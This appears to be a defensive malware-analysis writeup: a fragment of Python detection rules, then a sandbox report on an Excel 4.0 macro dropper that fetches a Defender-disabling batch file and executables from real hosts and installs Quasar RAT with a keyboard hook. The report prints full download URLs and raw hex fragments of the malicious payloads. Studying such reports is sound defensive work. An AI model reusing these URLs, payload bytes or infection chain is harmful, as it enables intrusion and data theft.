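    return [[name for name, rule in RULES.items() if rule(ev)] for ev in events]


if __name__ == "__main__":
    for ev, hits in zip(EVENTS, evaluate(EVENTS)):
        print(_basename(ev["ParentImage"]), "->", _basename(ev["Image"]), hits)
```

Of the three, only the first fires at the point where blocking would still have mattered: EXCEL.EXE spawning cmd.exe happens before anything is downloaded. The other two fire on the RAT's persistence and on the batch file being hidden, which is useful corroboration in a timeline but comes after sp.exe is already running.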

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\5DVxvgK9jn5gaBl[1].exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | ReversingLabs: Detection: 29%
Multi AV Scanner detection for submitted file
Source: spetsifikatsiya.xls | Virustotal: Detection: 13%
Yara detected Quasar RAT
Source: Yara match | File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5DVxvgK9jn5gaBl[1].exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JrekdQ.exe | Joe Sandbox ML: detected
Source: sp.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_005C7F30 FindFirstFileW,GetLastError,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 4x nop then jmp 01F65B55h (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Code function: 4x nop then jmp 003E5B55h (3 occurrences)
Source: global traffic | DNS query: name: cutt.ly
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.67.8.238:443 (2 occurrences)

Networking:

Connects to many ports of the same IP (likely port scanning)
Source: global traffic | TCP traffic: 185.157.162.81 ports 1,3,1973,1972,7,9
May check the online IP address of the machine
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 185.157.162.81:1973
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:57:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Wed, 06 Jan 2021 00:13:34 GMTETag: "53b13c0-42e600-5b83031a39cfd"Accept-Ranges: bytesContent-Length: 4384256Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f ff f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 42 00 00 0a 00 00 00 00 00 00 de f8 42 00 00 20 00 00 00 00 43 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 43 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c f8 42 00 4f 00 00 00 00 00 43 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 43 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 d8 42 00 00 20 00 00 00 da 42 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 06 00 00 00 00 43 00 00 08 00 00 00 dc 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 43 00 00 02 00 00 00 e4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f8 42 00 00 00 00 00 48 00 00 00 02 00 05 00 20 9c 00 00 54 4f 03 00 03 00 00 00 4d 01 00 06 
74 eb 03 00 18 0d 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 dd 00 00 00 01 00 00 11 00 d0 02 00 00 02 28 16 00 00 0a 28 17 00 00 0a 6f 18 00 00 0a 28 19 00 00 0a 72 01 00 00 70 28 1a 00 00 0a 0a 72 05 00 00 70 20 10 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0b 07 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 0c 08 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 39 00 00 70 20 11 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0d 09 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 04 11 04 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 4d 00 00 70 20 12 27 00 00 06 72 19 00 00 70 73 06 00 00 06 13 05 11 05 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 06 11 06 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 2a 22 02 28 1f 00 00 0a 00 2a 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 14 0a 2b 00 06 2a 00 13 30 06 00 73 00 00 00 00 00 00 00 02 28 20 00 00 0a 00 00 02 73 21 00 00 0a 7d 05 00 00 04 02 03
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:59:04 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 13:10:58 GMTETag: "53b28b5-db800-5b826effab56e"Accept-Ranges: bytesContent-Length: 899072Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 
11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 06 Jan 2021 08:59:54 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 13:10:58 GMTETag: "53b28b5-db800-5b826effab56e"Accept-Ranges: bytesContent-Length: 899072Keep-Alive: timeout=3, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 
11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e
Source: global traffic | HTTP traffic detected: GET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1 Host: 37.46.150.139 Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1 Host: gtp.bg Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 172.67.8.238
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: SUPERHOSTING_ASBG
Source: Joe Sandbox View | ASN Name: OBE-EUROPEObenetworkEuropeSE
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic | HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gtp.bg Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /json/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0 Host: ip-api.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: gtp.bg Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 37.46.150.139
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_00415B0A WSARecv,
Source: C:\Users\user\AppData\Roaming\sp.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: unknown | DNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2105110121.00000000022E0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2122564392.0000000002440000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2101215112.0000000002370000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2152867669.00000000022F0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2102819538.0000000000379000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piri
Source: powershell.exe, 00000007.00000002.2102767553.000000000034E000.00000004.00000020.sdmp, powershell.exe, 0000000D.00000002.2100756481.000000000032E000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2152365583.000000000038E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: sp.exe | String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe
Source: C:\Users\user\AppData\Roaming\sp.exe | Windows user hook set: 0 mouse low level NULL

          E-Banking Fraud:

Yara detected Quasar RAT
Source: Yara match | File source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

Malicious sample detected (through community Yara rule)
Source: dump.pcap, type: PCAP | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2113764449.000000000384C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000023.00000002.2389281983.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 00000025.00000002.2384182418.0000000003CC0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 0000001F.00000002.2282183645.0000000003C60000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detects Quasar RAT Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED | Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Patchwork malware Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar RAT Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 35.2.eyBLwzbrUF1mwXoy.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 | Screenshot OCR: document is protected 1. Open the document in Ljivmjt' iS not available for protected documents.
Source: Document image extraction number: 0 | Screenshot OCR: protected documents. 2. If this document was downloaded from your email, please click EnUk Editim
Source: Document image extraction number: 1 | Screenshot OCR: document is protected 1. Qpen the document in Microsoft Offiu'. Prrvirwing onlinr is not availabk
Found Excel 4.0 Macro with suspicious formulas
Source: spetsifikatsiya.xls | Initial sample: EXEC
Found obfuscated Excel 4.0 Macro
Source: spetsifikatsiya.xls | Initial sample: High usage of CHAR() function: 21
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\sp.exe
Source: C:\Users\user\AppData\Roaming\sp.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\AppData\Roaming\sp.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sp.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\ars4t7gFPGrepVgh.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_005C6B10: new,DeviceIoControl,
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E2A38
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E4CD8
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E02D8
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E5AF0
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E6350
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E75F4
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E4CC8
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E3540
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E3500
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E3530
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E37DA
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E63D9
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E37E8
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_004E5BB0
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_00983657
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_009809A1
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_00980500
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 24_2_0098375C
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_006940D0
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_006849A0
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_0040EA7D
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_004F2AA7
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_0042ABC1
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_0068321E
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_00411532
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_004276C4
Source: C:\Users\user\AppData\Roaming\sp.exe | Code function: 28_2_00689D67
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00481811
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00483178
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_0048E138
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00482229
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00488358
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00480470
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00480FC8
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00484000
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00485811
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00485178
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00485188
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00485348
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_0048D308
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00485338
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_0048CBC0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_0048BCA0
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00484DB9
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_0048F748
Source: C:\Users\user\AppData\Local\Temp\eyBLwzbrUF1mwXoy.exe | Code function: 31_2_00483FF1
